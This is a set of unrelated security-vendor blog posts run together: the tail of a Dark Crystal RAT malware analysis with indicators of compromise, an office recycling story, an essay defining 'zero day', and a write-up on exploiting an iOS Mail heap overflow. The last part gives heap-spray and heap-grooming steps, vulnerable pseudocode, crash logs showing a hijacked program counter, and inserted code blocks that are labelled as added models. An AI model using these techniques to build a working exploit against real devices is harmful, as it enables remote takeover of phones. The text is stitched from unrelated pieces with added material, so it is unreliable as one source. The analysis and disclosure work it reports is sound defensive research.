In this post we walked through our analysis of the sample that the threat intel team provided to us and all its components. Through our initial triage, we found that its “dfsds.exe” component is Dark Crystal RAT. We found that Dark Crystal RAT was a .NET executable, and reverse engineered it. We extracted the malware’s configuration, and through dynamic analysis discovered the syntax of its C2 communications. We implemented a small proof-of-concept server to test the correct format of commands that can be sent to the malware, and how to interpret its uploaded screenshots. Finally, we took a second look at how actual threat actors would download and use Dark Crystal RAT.

To conclude, indicators of compromise for this version of Dark Crystal RAT (MD5: 047af34af65efd5c6ee38eb7ad100a01) are given in Table 4.

Indicators of Compromise

Dark Crystal RAT (dfsds.exe)

Handle artifacts
  Mutex name        bc2dc004028c4f0303f5e49984983352

Registry artifacts
  Registry value    HKCU\Software\Microsoft\Windows\CurrentVersion\Run\scrss
  Registry value    HKCU\Software\Microsoft\Windows\CurrentVersion\Run\Wininit

File system artifacts
  File              C:\Sysdll32.lnk
  File              %APPDATA%\dotNET.lnk
  File              Start Menu\Programs\Startup\Sysdll32.lnk
  File              Start Menu\Programs\Startup\dotNET.lnk
  File              %APPDATA%\<random process name>.exe
  File              C:\<random process name>.exe

Network artifacts
  HTTP request      hxxp://domalo[.]online/ksezblxlvou3kcmbq8l7hf3f4cy5xgeo4udla91dueu3qa54/46kqbjvyklunp1z56txzkhen7gjci3cyx8ggkptx25i74mo6myqpx9klvv3/212bad81b4208a2b412dfca05f1d9fa7.php?data=active
  HTTP request      hxxp://domalo[.]online/ksezblxlvou3kcmbq8l7hf3f4cy5xgeo4udla91dueu3qa54/46kqbjvyklunp1z56txzkhen7gjci3cyx8ggkptx25i74mo6myqpx9klvv3/akcii239myzon0xwjlxqnn3b34w/212bad81b4208a2b412dfca05f1d9fa7.php?type=__ds_getdata&__ds_getdata_user=<user_hash>&__ds_getdata_ext=<message_hash>&__ds_getdata_key=<key>
  HTTP request      hxxp://domalo[.]online/ksezblxlvou3kcmbq8l7hf3f4cy5xgeo4udla91dueu3qa54/46kqbjvyklunp1z56txzkhen7gjci3cyx8ggkptx25i74mo6myqpx9klvv3/akcii239myzon0xwjlxqnn3b34w/<user_hash>.<message_hash>
  TCP connection    domalo[.]online:80
  TCP connection    ipinfo[.]ip
  DNS lookup        domalo[.]online
  DNS lookup        ipinfo[.]ip

Strings
  Static string     DCRatBuild

Table 4: IoCs for this instance of DCRat

FireEye Product Support for Dark Crystal RAT

Table 5 describes how FireEye products react to the initial sample (MD5: b478d340a787b85e086cc951d0696cb1) and its Dark Crystal RAT payload, or in the case of Mandiant Security Validation, allow a stakeholder to validate their own capability to detect Dark Crystal RAT.

FireEye Product                     Support for Dark Crystal RAT
FireEye Network Security (NX)       Backdoor.Plurox detection
FireEye Email Security (EX & ETP)   Backdoor.MSIL.DarkCrystal, Backdoor.Plurox, Malware.Binary.exe, Trojan.Vasal.FEC3, Win.Ransomware.Cerber-6267996-1, fe_ml_heuristic detections
FireEye Endpoint Security (HX)      Trojan.GenericKD.32546165, Backdoor.MSIL.DarkCrystal detections
FireEye Malware Analysis (AX)       Backdoor.Plurox.FEC2 detection
FireEye Detection on Demand (DoD)   Backdoor.Plurox.FEC2, FireEye.Malware detections
Mandiant Security Validation        Built-in Action coming soon

Table 5: Support in FireEye products to detect Dark Crystal RAT or validate detection capability

Making Moves to Go Green at McAfee Waterloo

By Gurjeet, Software Engineer, Canada

“We should protect Mother Earth. If we don’t take care of her, she won’t take care of us.”

This was my kindergartner’s response when I asked what he was doing while I watched him carefully dispose of forgotten candy wrappers outside of the school.

His answer led me down an unexpected path to become a member of McAfee’s Green Team in the Waterloo office.

Inspired to Go Green

After that day in the schoolyard, I joined my son’s cleanup efforts, rather than idly waiting in the school pickup zone. Soon, other parents rolled up their sleeves to help improve our children’s environment.

Inspired by the momentum, I reexamined my household’s plastic consumption and recycling habits.

I felt pretty good; after all, I was doing my part to better our environment. Then I read my colleague’s LinkedIn post:

“Who uses their trash bin at their desk? Consider using the bin in a break room or hallway to decrease your plastic consumption.”

He was right. I often used the bin at my desk, which is emptied nightly, regardless if it only held one item. I was contributing to plastic consumption at the office. My colleague’s simple act of raising awareness struck a chord with me. I could do more. By doing small things, I could make a big difference at McAfee.

The next day, I approached my colleague and we collaborated to launch Waterloo’s Green Team.

Actions in Year One

Excited by the possibilities, we gathered a few other team members and identified small changes we could make for a big impact. Outside of raising awareness, we narrowed our focus to three:

  1. Decreased plastics: Our Waterloo office was dependent on paper and plastic products. We replaced plastic cutlery and cups with real spoons, forks, plates, glassware and coffee mugs.
  2. Added bin stations and labels: To my colleague’s point, the trash bins would be emptied at each individual desk, even if there was only one item. We removed individual bins and invested in recycling and trash stations at convenient locations throughout the building. We also created signage that better defined what could be added to each bin.
  3. Gifted reusable tote bags: To decrease the amount of plastic coming in from outside the building, such as disposable lunch bags, and encourage others to do the same, we offered reusable tote bags to our Waterloo team members.

Our grassroots efforts during the first year were just the start. We continue to plan for the year ahead, and as McAfee launches additional green teams around the world, we plan to collaborate to make an even greater impact.

Lessons Learned

One person can make an impact. Small changes add up. These are my biggest takeaways.

My son’s small action in the schoolyard reverberated throughout my household, and eventually McAfee, when I found passion and purpose that I didn’t realize I had. You can make a difference.

My unexpected journey also held unexpected lessons. While incredibly rewarding, my day job as a software engineer doesn’t afford many opportunities to organize events, speak in public or mobilize people. Through my involvement in the Green Team, I uncovered skills I didn’t know existed.

I’m proud to work for a company that supports employees in their passions, especially when it’s for a more sustainable future for us all.

Interested in joining a company that supports green initiatives? Search our openings.

The post Making Moves to Go Green at McAfee Waterloo appeared first on McAfee Blogs.

What the hell does “zero day” even mean anymore?

I seem to have spent a fair amount of my time recently talking to a variety of people about “zero days,” and the one thing that has really struck me is that almost everyone has a different view on what a “zero day” actually is. So I figured the time had come to try and add a little clarity to the situation.

For those of you really short on time, let’s be clear: zero days do exist, and they can be highly damaging, but there are many other things both easier to fix and with a greater return on investment for most organizations. So, step 1 should be to fix things like patching and user education before devoting limited resources to the tiny minority of truly zero day attacks.

And for those of you with a little more time on your hands, let’s examine why that last paragraph recommends what it does. First things first, we should talk about vulnerabilities and exploits, because while the two are clearly linked they are, of course, very different. In simple terms, a vulnerability is a weakness or error in a piece of code. An exploit is a separate piece of code that takes advantage of that vulnerability to enable the bad guys to achieve their goals.

The term “zero day” is valid in both contexts. It’s typically used in reference to an exploit – but not always – and in my experience, that creates some of the confusion. As a side note, in the fast-moving world of IT security and malware, confusion among security teams can only ever be a bad thing for those of us working hard to stop the bad guys from profiting. I will try to be clear in which context I’m using it throughout this blog.

So, let’s take a look at some of the more common interpretations of “zero day” and examine which ones are valid:

1) “No signature exists in my current antivirus so it can’t detect this ‘zero day’ malware.”

There are more than 725,000 new malware files released each day, but the vast majority of this is simply recompiled versions of existing malware with a new file hash. A new hash does not equal zero day malware.

2) “I’ve never seen a piece of malware get delivered like that before”

Cyber criminals are always looking for a new way to deliver their payloads and they can be pretty creative, but the moniker zero day should be reserved for malware itself and not the method of distribution.

3) “There is a vulnerability in my system which I haven’t yet got around to patching.”

There are many reasons why patches are not always immediately applied (some of them are even acceptable!) but if a piece of malware ends up exploiting a known and unpatched vulnerability, that doesn’t retroactively turn this (possibly quite old) piece of malware into a zero day version.

4) “There is a whole new type of malware”

This must surely count as a ‘zero day’, right? I’m going to argue that it doesn’t. A new type of malware is likely to mean the cyber criminals have different goals. When crypto-malware (or ransomware, as it’s commonly known) began to hit people in force, this indicated that the bad guys had come up with a new way to make money: extortion. But the vulnerabilities being exploited to execute their code and the mechanisms of delivering that code to their victims’ machines were the same as before, and on that basis I wouldn’t count it as ‘zero day’.

5) “I’m aware of a newly discovered vulnerability but there is no patch currently available to fix it” (or potentially such a recent patch that there has not been an opportunity to test it within my organization)

In reality this is a rare event. However, I would argue that when there is no patch available, and therefore no way to update systems to protect against the vulnerability, this can be considered a ‘zero-day’ vulnerability.

6) “An unknown vulnerability has been discovered and exploited by the bad guys”

In this example nobody except the cyber criminals is even aware a vulnerability exists, and therefore nobody is even trying to fix it. THIS is a true ‘zero day’ threat. Fortunately, though, they are actually pretty rare.

So, what does all this mean from a security perspective?

That’s going to be the subject of my next blog, so watch this space.

The post What the hell does “zero day” even mean anymore? appeared first on McAfee Blogs.

Seeing (Mail)Demons? Technique, Triggers, and a Bounty

Impact & Key Details (TL;DR)

  1. Demonstrate a way to do a basic heap spray
  2. We were able to use this technique to verify that this vulnerability is exploitable. We are still working on improving the success rate.
  3. Present two new examples of in-the-wild triggers so you can judge for yourself whether these bugs are worth an out-of-band patch
  4. Suggestions to Apple on how to improve forensics information / logs and important questions following Apple’s response to the previous disclosure
  5. Launching a bounty program for people who have traces of attacks with total bounties of $27,337
  6. MailDemon appears to be even more ancient than we initially thought. There is a trigger for this vulnerability, in the wild, 10 years ago, on iPhone 2g, iOS 3.1.3

Following our announcement of RCE vulnerabilities discovery in the default Mail application on iOS, we have been contacted by numerous individuals who suspect they were targeted by this and related vulnerabilities in Mail.

ZecOps encourages Apple to release an out of band patch for the recently disclosed vulnerabilities and hopes that this blog will provide additional reinforcement to release patches as early as possible. In this blogpost we will show a simple way to spray the heap, whereby we were able to prove that remote exploitation of this issue is possible, and we will also provide two examples of triggers observed in the wild.

At present, we already have the following:

  • Remote heap-overflow in Mail application
  • Ability to trigger the vulnerability remotely with attacker-controlled input through an incoming mail
  • Ability to alter code execution
  • Kernel Elevation of Privileges 0day

What we don’t have:

  • An infoleak – but there is a twist: the infoleak does not have to be in Mail, since an infoleak in almost any other process would be sufficient. Because dyld_shared_cache is shared across most processes, an infoleak vulnerability doesn’t necessarily have to be inside MobileMail; for example, CVE-2019-8646 in iMessage can do the trick remotely as well, which opens additional attack surface (Facetime, other apps, iMessage, etc). There is a great talk by 5aelo during OffensiveCon covering similar topics.

Therefore, now we have all the requirements to exploit this bug remotely. Nonetheless, we prefer to be cautious in chaining this together because:

  • We have no intention of disclosing the LPE – it allows us to perform filesystem extraction / memory inspection on A12 devices and above when needed. You can read more about the problems of analyzing mobile devices at FreeTheSandbox.org
  • We haven’t seen exploitation in the wild for the LPE.

We will also share two examples of triggers that we have seen in the wild and let you make your own inferences and conclusions.


MailDemon Bounty

Lastly, we will present a bounty for those submissions that were able to demonstrate that they were attacked.

Exploiting MailDemon

As we previously hinted, MailDemon is a great candidate for exploitation because it overwrites small chunks of a MALLOC_NANO memory region, which stores a large number of Objective-C objects. Consequently, it allows attackers to manipulate an ISA pointer of the corrupted objects (allowing them to cause type confusions) or overwrite a function pointer to control the code flow of the process. This represents a viable approach of taking over the affected process.

Heap Spray & Heap Grooming Technique

In order to control the code flow, a heap spray is required to place crafted data into the memory. With the sprayed fake class containing a fake method cache of ‘dealloc’ method, we were able to control the Program Counter (PC) register after triggering the vulnerability using this method*.

The following is a partial crash log generated while testing our POC:

Exception Type:  EXC_BAD_ACCESS (SIGBUS)
Exception Subtype: EXC_ARM_DA_ALIGN at 0xdeadbeefdeadbeef
VM Region Info: 0xdeadbeefdeadbeef is not in any region.  Bytes after previous region: 16045690973559045872  
      REGION TYPE                      START - END             [ VSIZE] PRT/MAX SHRMOD  REGION DETAIL
      MALLOC_NANO            0000000280000000-00000002a0000000 [512.0M] rw-/rwx SM=PRV  
--->  
      UNUSED SPACE AT END

Thread 18 name:  Dispatch queue: com.apple.CFNetwork.Connection
Thread 18 Crashed:
0   ???                           	0xdeadbeefdeadbeef 0 + -2401053088876216593
1   libdispatch.dylib             	0x00000001b7732338 _dispatch_lane_serial_drain$VARIANT$mp  + 612
2   libdispatch.dylib             	0x00000001b7732e74 _dispatch_lane_invoke$VARIANT$mp  + 480
3   libdispatch.dylib             	0x00000001b773410c _dispatch_workloop_invoke$VARIANT$mp  + 1960
4   libdispatch.dylib             	0x00000001b773b4ac _dispatch_workloop_worker_thread  + 596
5   libsystem_pthread.dylib       	0x00000001b796a114 _pthread_wqthread  + 304
6   libsystem_pthread.dylib       	0x00000001b796ccd4 start_wqthread  + 4


Thread 18 crashed with ARM Thread State (64-bit):
    x0: 0x0000000281606300   x1: 0x00000001e4b97b04   x2: 0x0000000000000004   x3: 0x00000001b791df30
    x4: 0x00000002827e81c0   x5: 0x0000000000000000   x6: 0x0000000106e5af60   x7: 0x0000000000000940
    x8: 0x00000001f14a6f68   x9: 0x00000001e4b97b04  x10: 0x0000000110000ae0  x11: 0x000000130000001f
   x12: 0x0000000110000b10  x13: 0x000001a1f14b0141  x14: 0x00000000ef02b800  x15: 0x0000000000000057
   x16: 0x00000001f14b0140  x17: 0xdeadbeefdeadbeef  x18: 0x0000000000000000  x19: 0x0000000108e68038
   x20: 0x0000000108e68000  x21: 0x0000000108e68000  x22: 0x000000016ff3f0e0  x23: 0xa3a3a3a3a3a3a3a3
   x24: 0x0000000282721140  x25: 0x0000000108e68038  x26: 0x000000016ff3eac0  x27: 0x00000002827e8e80
   x28: 0x000000016ff3f0e0   fp: 0x000000016ff3e870   lr: 0x00000001b6f3db9c
    sp: 0x000000016ff3e400   pc: 0xdeadbeefdeadbeef cpsr: 0x60000000

The ideal primitive for heap spray in this case is a memory leak bug that can be triggered remotely, since we want the sprayed memory to stay untouched until the memory corruption is triggered. We leave this as an exercise for the reader. Such a primitive could qualify for up to a $7,337 bounty from ZecOps (read more below).

Another way is using MFMutableData itself: when the size of MFMutableData is less than 0x20000 bytes, it allocates memory from the heap instead of creating a file to store the content. We can control the MFMutableData size by splitting the content of the email into lines of less than 0x20000 bytes, since the IMAP library reads email content line by line. With this primitive we have a better chance of placing the payload at the address we want.

Trigger

An oversized email is capable of reproducing the vulnerability as a PoC (see details in our previous blog), but for a stable exploit we need to take a closer look at “-[MFMutableData appendBytes:length:]”:

-[MFMutableData appendBytes:length:] 
{
  int old_len = [self length];
  //...
  char* bytes = self->bytes;
  if(!bytes){
     bytes = [self _mapMutableData]; //Might be a data pointer of a size 8 heap
  }
  copy_dst = bytes + old_len;
  //...
  memmove(copy_dst, append_bytes, append_length); // It used append_length to copy the memory, causing an OOB writing in a small heap
}

The destination address of memmove is “bytes + old_len” instead of “bytes”. So what if we accumulate too much data before triggering the vulnerability? The “old_len” would end up with a very large value, so the destination address ends up at an invalid address beyond the edge of this region and the process crashes immediately, given that the size of the MALLOC_NANO region is 512MB.


             +----------------+0x280000000
             |                |
   bytes --> +----------------+\
             |                | +
             |                | |
             |                | |
             |    padding     | |
             |                | |
             |                | | old_len
             |                | |
             |                | |
             |                | |
             |                | +
copy_dst --> +----------------+/
             | overflow data  |
             +----------------+
             |                |
             |                |
             |                |
             |                |
             +----------------+0x2a0000000

In order to reduce the size of “padding”, we need to consume as much data as possible before triggering the vulnerability – a memory leak would be one of our candidates.

Note that the “padding” does not mean the overflow address is completely random: the “padding” is predictable per hardware model, since the RAM size is the same and, during our tests, mmap usually failed at the same size.
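The appendBytes: defect described above, modelled beside a bounds-checked variant. This is an added example, not Apple's code and not the ZecOps PoC: the heap is a bytearray, so the out-of-bounds write lands in a neighbouring slot of the same arena where it can be inspected, a write past the arena stands in for the crash the text describes, and the MALLOC_NANO bounds are the ones quoted in the crash log.

```python
"""Model of the -[MFMutableData appendBytes:length:] defect (added example; not
Apple's code and not ZecOps' PoC). A bytearray plays the role of the heap."""
from dataclasses import dataclass

# MALLOC_NANO bounds quoted in the crash log above (512 MB region).
NANO_START = 0x280000000
NANO_END = 0x2A0000000


@dataclass
class MutableData:
    """Simplified stand-in for the object: a chunk at `offset` in the arena,
    `cap` bytes really backing it, `length` bytes in use (old_len)."""
    offset: int
    cap: int
    length: int = 0


def append_unchecked(arena: bytearray, d: MutableData, data: bytes) -> int:
    """Mirrors the vulnerable logic: copy_dst = bytes + old_len, then a copy of
    append_length bytes with no comparison against the chunk's real capacity."""
    copy_dst = d.offset + d.length
    if copy_dst + len(data) > len(arena):
        # Destination beyond the region: the process just crashes.
        raise MemoryError("copy_dst past the end of the region")
    arena[copy_dst:copy_dst + len(data)] = data
    d.length += len(data)
    return len(data)


def append_checked(arena: bytearray, d: MutableData, data: bytes) -> int:
    """Hardened form: refuse (a real implementation would grow the chunk first)
    when the copy would cross the end of the chunk. Returns bytes written."""
    if len(data) > d.cap - d.length:
        return 0
    copy_dst = d.offset + d.length
    arena[copy_dst:copy_dst + len(data)] = data
    d.length += len(data)
    return len(data)


def neighbour_isa_corrupted(checked: bool, n: int) -> bool:
    """Place a 16-byte chunk directly before a neighbour object whose first
    8 bytes stand in for its isa pointer, append n bytes, and report whether
    the isa changed. This is the small-chunk corruption the text relies on."""
    arena = bytearray(64)
    isa = b"\x11" * 8
    arena[16:24] = isa  # neighbour object begins right after the chunk
    d = MutableData(offset=0, cap=16)
    append = append_checked if checked else append_unchecked
    append(arena, d, b"A" * n)
    return bytes(arena[16:24]) != isa


def overflow_past_region_crashes(n: int) -> bool:
    """The other outcome from the text: a copy that runs past the region ends in
    a crash rather than silent corruption (modelled here as MemoryError)."""
    arena = bytearray(32)
    try:
        append_unchecked(arena, MutableData(offset=0, cap=8), b"A" * n)
    except MemoryError:
        return True
    return False


def copy_dst_in_nano(bytes_addr: int, old_len: int) -> bool:
    """The diagram's point: copy_dst = bytes + old_len stays inside the 512 MB
    MALLOC_NANO region only while old_len is small enough."""
    copy_dst = bytes_addr + old_len
    return NANO_START <= copy_dst < NANO_END


if __name__ == "__main__":
    print("unchecked, 24 bytes into a 16-byte chunk:", neighbour_isa_corrupted(False, 24))
    print("checked, same append:", neighbour_isa_corrupted(True, 24))
    print("copy past region crashes:", overflow_past_region_crashes(64))
```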

Crash analysis

This post discusses several triggers and exploitability of the MobileMail vulnerability detected in the wild which we covered in our previous blog.

Case 1 shows that the vulnerability is triggered in the wild before it was disclosed.

Case 2 is due to memory corruption in the MALLOC_NANO region, the value of the corrupted memory is part of the sent email and completely controlled by the sender.

Case 1

The following crash was triggered right inside the vulnerable function while the overflow happens. 

Coalition:           com.apple.mobilemail [521]

Exception Type:  EXC_BAD_ACCESS (SIGSEGV)
Exception Subtype: KERN_INVALID_ADDRESS at 0x000000004a35630e //[a]
VM Region Info: 0x4a35630e is not in any region.  Bytes before following region: 3091946738
      REGION TYPE                      START - END             [ VSIZE] PRT/MAX SHRMOD  REGION DETAIL
      UNUSED SPACE AT START
--->  
      __TEXT                 000000010280c000-0000000102aec000 [ 2944K] r-x/r-x SM=COW  ...p/MobileMail]


Thread 4 Crashed:
0   libsystem_platform.dylib      	0x00000001834a5a80 _platform_memmove  + 208
       0x1834a5a74         ldnp x10, x11, [x1, #16]       
       0x1834a5a78         add x1, x1, 0x20               
       0x1834a5a7c         sub x2, x2, x5                 
       0x1834a5a80         stp x12, x13, [x0]   //[b]          
       0x1834a5a84         stp x14, x15, [x0, #16]        
       0x1834a5a88         subs x2, x2, 0x40              
       0x1834a5a8c         b.ls 0x00002ab0    

1   MIME                          	0x00000001947ae104 -[MFMutableData appendBytes:length:]  + 356
2   Message                       	0x0000000194f6ce6c -[MFDAMessageContentConsumer consumeData:length:format:mailMessage:]  + 804
3   DAEAS                         	0x000000019ac5ca8c -[ASAccount folderItemsSyncTask:handleStreamOperation:forCodePage:tag:withParentItem:withData:dataLength:]  + 736
4   DAEAS                         	0x000000019aca3fd0 -[ASFolderItemsSyncTask handleStreamOperation:forCodePage:tag:withParentItem:withData:dataLength:]  + 524
5   DAEAS                         	0x000000019acae338 -[ASItem _streamYourLittleHeartOutWithContext:]  + 440
6   DAEAS                         	0x000000019acaf4d4 -[ASItem _streamIfNecessaryFromContext:]  + 96
7   DAEAS                         	0x000000019acaf758 -[ASItem _parseNextValueWithDataclass:context:root:parent:callbackDict:streamCallbackDict:parseRules:account:]  + 164
8   DAEAS                         	0x000000019acb001c -[ASItem parseASParseContext:root:parent:callbackDict:streamCallbackDict:account:]  + 776
9   DAEAS                         	0x000000019acaf7d8 -[ASItem _parseNextValueWithDataclass:context:root:parent:callbackDict:streamCallbackDict:parseRules:account:]  + 292
10  DAEAS                         	0x000000019acb001c -[ASItem parseASParseContext:root:parent:callbackDict:streamCallbackDict:account:]  + 776
...

Thread 4 crashed with ARM Thread State (64-bit):
    x0: 0x000000004a35630e   x1: 0x00000001149af432   x2: 0x0000000000001519   x3: 0x000000004a356320
    x4: 0x0000000100000028   x5: 0x0000000000000012   x6: 0x0000000c04000100   x7: 0x0000000114951a00
    x8: 0x44423d30443d3644   x9: 0x443d30443d38463d  x10: 0x3d31413d31443d30  x11: 0x31413d31463d3444
   x12: 0x33423d30453d3043  x13: 0x433d30443d35423d  x14: 0x3d30443d36443d44  x15: 0x30443d38463d4442
   x16: 0x00000001834a59b0  x17: 0x0200080110000100  x18: 0xfffffff00a0dd260  x19: 0x000000000000152b
   x20: 0x00000001149af400  x21: 0x000000004a35630e  x22: 0x000000004a35630f  x23: 0x0000000000000008
   x24: 0x000000000000152b  x25: 0x0000000000000000  x26: 0x0000000000000000  x27: 0x00000001149af400
   x28: 0x000000018dbd34bc   fp: 0x000000016da4c720   lr: 0x00000001947ae104
    sp: 0x000000016da4c720   pc: 0x00000001834a5a80 cpsr: 0x80000000

From [a] and [b] we know that the process crashed inside “memmove”, called by “-[MFMutableData appendBytes:length:]”, which means the value of “copy_dst” was already an invalid address, 0x4a35630e.

So where did the value of register x0 (0x4a35630e) come from? It is much smaller than the lowest valid address.

It turns out that the process crashed after failing to mmap a file and then also failing to allocate the 8-byte memory.

The invalid address 0x4a35630e is actually an offset: the length of the MFMutableData before the vulnerability was triggered (i.e. “old_len”). When calloc fails to allocate the memory it returns NULL, so copy_dst becomes “0 + old_len (0x4a35630e)”.

In this case “old_len” is about 1.2GB, which matches the average length of our POC; a length like this is likely to cause an mmap failure and trigger the vulnerability.

Please note that x8-x15 and x0 are fully controlled by the sender.

The crash also answers the question raised above, “What if we accumulate too much data before triggering the vulnerability?”: the allocation of the 8-byte memory can fail, and the process then crashes while copying the payload to an invalid address. This can make reliable exploitation more difficult, since the process may crash before the program counter is taken over.
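Added illustration, not code from ZecOps or Apple: a simplified C model of the failure path described above. unchecked_copy_dst reproduces the arithmetic the crash exposes (a NULL fallback chunk plus old_len gives the Case 1 fault address), checked_copy_dst shows the two checks that prevent it, and safe_append is a hardened append that grows its buffer before copying. All names and the structure are hypothetical; the old_len and copy-length constants are taken from the Case 1 register dump.

```c
#include <stdint.h>
#include <stdlib.h>
#include <string.h>
#include <stdio.h>

/* Hypothetical model, not Apple's implementation: the size of the small
 * fallback chunk the text describes being used when the file mapping fails. */
#define FALLBACK_CHUNK_SIZE 8u

/* Values taken from the Case 1 register dump above. */
#define CASE1_OLD_LEN   0x4a35630eULL   /* length before the append ("old_len") */
#define CASE1_COPY_LEN  0x1519ULL       /* x2: bytes still to be copied by memmove */

enum append_status { APPEND_OK = 0, APPEND_ENOMEM = -1, APPEND_EOVERFLOW = -2 };

/* The arithmetic the crash log exposes: destination = fallback chunk + old_len,
 * with no check that the chunk was allocated at all or that old_len + len fits
 * in it. Done on integers so the model never dereferences a bad pointer.
 * With chunk == 0 (calloc failed) this returns 0x4a35630e, the Case 1 address. */
uint64_t unchecked_copy_dst(uint64_t fallback_chunk, uint64_t old_len) {
    return fallback_chunk + old_len;
}

/* Hardened equivalent: refuse the copy unless the allocation succeeded and the
 * write [old_len, old_len + len) lies entirely inside the chunk. */
enum append_status checked_copy_dst(const void *fallback_chunk, size_t chunk_size,
                                    size_t old_len, size_t len, uintptr_t *dst_out) {
    if (fallback_chunk == NULL)
        return APPEND_ENOMEM;                 /* Case 1: calloc returned NULL */
    if (old_len > chunk_size || len > chunk_size - old_len)
        return APPEND_EOVERFLOW;              /* an 8-byte chunk cannot hold old_len + len */
    *dst_out = (uintptr_t)fallback_chunk + old_len;
    return APPEND_OK;
}

/* A growable buffer that appends safely: capacity is grown first, allocation
 * failure leaves the object untouched, and the copy is always in bounds. */
struct growable {
    uint8_t *buf;
    size_t   len;
    size_t   cap;
};

enum append_status safe_append(struct growable *g, const uint8_t *bytes, size_t len) {
    if (len > SIZE_MAX - g->len)
        return APPEND_EOVERFLOW;              /* old_len + len would wrap around */
    size_t need = g->len + len;
    if (need > g->cap) {
        size_t new_cap = g->cap ? g->cap : FALLBACK_CHUNK_SIZE;
        while (new_cap < need) {
            if (new_cap > SIZE_MAX / 2) { new_cap = need; break; }
            new_cap *= 2;
        }
        uint8_t *nb = realloc(g->buf, new_cap);
        if (nb == NULL)
            return APPEND_ENOMEM;             /* nothing copied, nothing corrupted */
        g->buf = nb;
        g->cap = new_cap;
    }
    memcpy(g->buf + g->len, bytes, len);      /* in bounds by construction */
    g->len = need;
    return APPEND_OK;
}

int main(void) {
    uintptr_t dst = 0;
    printf("unchecked dst with NULL chunk: 0x%llx\n",
           (unsigned long long)unchecked_copy_dst(0, CASE1_OLD_LEN));
    printf("checked dst with NULL chunk: %d\n",
           checked_copy_dst(NULL, FALLBACK_CHUNK_SIZE, (size_t)CASE1_OLD_LEN,
                            (size_t)CASE1_COPY_LEN, &dst));

    uint8_t chunk[FALLBACK_CHUNK_SIZE] = {0};
    printf("checked dst, chunk too small: %d\n",
           checked_copy_dst(chunk, sizeof chunk, (size_t)CASE1_OLD_LEN,
                            (size_t)CASE1_COPY_LEN, &dst));

    struct growable g = {0};
    const uint8_t hdr[] = "Content-Type: text/plain\r\n";   /* constructed sample */
    printf("safe_append: %d, len=%zu cap=%zu\n",
           safe_append(&g, hdr, sizeof hdr - 1), g.len, g.cap);
    free(g.buf);
    return 0;
}
```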

A Blast From The Past: Mysterious Trigger on iOS 3.1.3 in 2010!

Notably, we found a public example of a very similar trigger, posted by an anonymous user on the modmy.com forums: https://forums.modmy.com/native-iphone-ipod-touch-app-launches-f29/734050-mail-app-keeps-crashing-randomly.html

Vulnerable version: iOS 3.1.3 on iPhone 2G
Time of crash: 22nd of October, 2010

The user “shyamsandeep” registered on the 12th of June 2008, last logged in on the 16th of October 2011, and had a single post in the forum, which contained this exact trigger.

This crash had r0 equal to 0x037ea000, which could be the result of the first vulnerability we disclosed in our previous blog, the one due to ftruncate() failure. Interestingly, as we explained in the first case, it could also be the result of the 8-byte memory allocation failing; however, it is not possible to determine the exact reason, since the log lacks memory region information. Nonetheless, it is certain that there have been in-the-wild triggers of this exploitable vulnerability since 2010.

Identifier: MobileMail
Version: ??? (???)
Code Type: ARM (Native)
Parent Process: launchd [1]

Date/Time: 2010-10-22 08:14:31.640 +0530
OS Version: iPhone OS 3.1.3 (7E18)
Report Version: 104

Exception Type: EXC_BAD_ACCESS (SIGSEGV)
Exception Codes: KERN_INVALID_ADDRESS at 0x037ea000
Crashed Thread: 4
Thread 4 Crashed:
0 libSystem.B.dylib 0x33aaef3c 0x33aad000 + 7996 //memcpy + 0x294
1 MIME 0x30a822a4 0x30a7f000 + 12964 //_FastMemoryMove + 0x44
2 MIME 0x30a8231a 0x30a7f000 + 13082 // -[MFMutableData appendBytes:length:] + 0x6a
3 MIME 0x30a806d6 0x30a7f000 + 5846 // -[MFMutableData appendData:] + 0x32
4 Message 0x342e2938 0x34251000 + 596280 // -[DAMessageContentConsumer consumeData:length:format:mailMessage:] + 0x25c
5 Message 0x342e1ff8 0x34251000 + 593912 // -[DAMailAccountSyncConsumer consumeData:length:format:mailMessage:] +0x24
6 DataAccess 0x34146b22 0x3413e000 + 35618 // -[ASAccount folderItemsSyncTask:handleStreamOperation:forCodePage:tag:withParentItem:withData:dataLength:] + 0x162
7 DataAccess 0x3416657c 0x3413e000 + 165244 // -[ASFolderItemsSyncTask handleStreamOperation:forCodePage:tag:withParentItem:withData:dataLength:] + 0x108
...

Thread 4 crashed with ARM Thread State:
r0: 0x037ea000 r1: 0x008729e0 r2: 0x00002205 r3: 0x4e414153
r4: 0x41415367 r5: 0x037e9825 r6: 0x00872200 r7: 0x007b8b78
r8: 0x0001f825 r9: 0x001fc098 r10: 0x00872200 r11: 0x0087c200
ip: 0x0000068a sp: 0x007b8b6c lr: 0x30a822ab pc: 0x33aaef3c
cpsr: 0x20000010

Case 2

The following is another crash, which happened after an email was received and processed.

Coalition:           com.apple.mobilemail [308]

Exception Type:  EXC_BAD_ACCESS (SIGSEGV)
Exception Subtype: KERN_INVALID_ADDRESS at 0x0041004100410041 // [a]
VM Region Info: 0x41004100410041 is not in any region.  Bytes after previous region: 18296140473139266  
      REGION TYPE                      START - END             [ VSIZE] PRT/MAX SHRMOD  REGION DETAIL
      mapped file            00000002d31f0000-00000002d6978000 [ 55.5M] r--/rw- SM=COW  ...t_id=9bfc1855
--->  
      UNUSED SPACE AT END

Thread 13 name:  Dispatch queue: Internal _UICache queue
Thread 13 Crashed:
0   libobjc.A.dylib               	0x00000001b040fca0 objc_release  + 16
       0x1b040fc94         mov x29, sp                    
       0x1b040fc98         cbz x0, 0x0093fce4             
       0x1b040fc9c         tbnz x0, #63, 0x0093fce4       
       0x1b040fca0         ldr x8, [x0]            // [b]       
       0x1b040fca4         and x8, x8, 0xffffffff8        
       0x1b040fca8         ldrb w8, [x8, #32]             
       0x1b040fcac         tbz w8, #2, 0x0093fd14         

1   CoreFoundation                	0x00000001b1119408 -[__NSDictionaryM removeAllObjects]  + 600
2   libdispatch.dylib             	0x00000001b0c5d7d4 _dispatch_client_callout  + 16
3   libdispatch.dylib             	0x00000001b0c0bc1c _dispatch_lane_barrier_sync_invoke_and_complete  + 56    
4   UIFoundation                  	0x00000001bb9136b0 __16-[_UICache init]_block_invoke  + 76     
5   libdispatch.dylib             	0x00000001b0c5d7d4 _dispatch_client_callout  + 16
6   libdispatch.dylib             	0x00000001b0c0201c _dispatch_continuation_pop$VARIANT$mp  + 412
7   libdispatch.dylib             	0x00000001b0c11fa8 _dispatch_source_invoke$VARIANT$mp  + 1308
8   libdispatch.dylib             	0x00000001b0c0ee00 _dispatch_kevent_worker_thread  + 1224   
9   libsystem_pthread.dylib       	0x00000001b0e3e124 _pthread_wqthread  + 320          
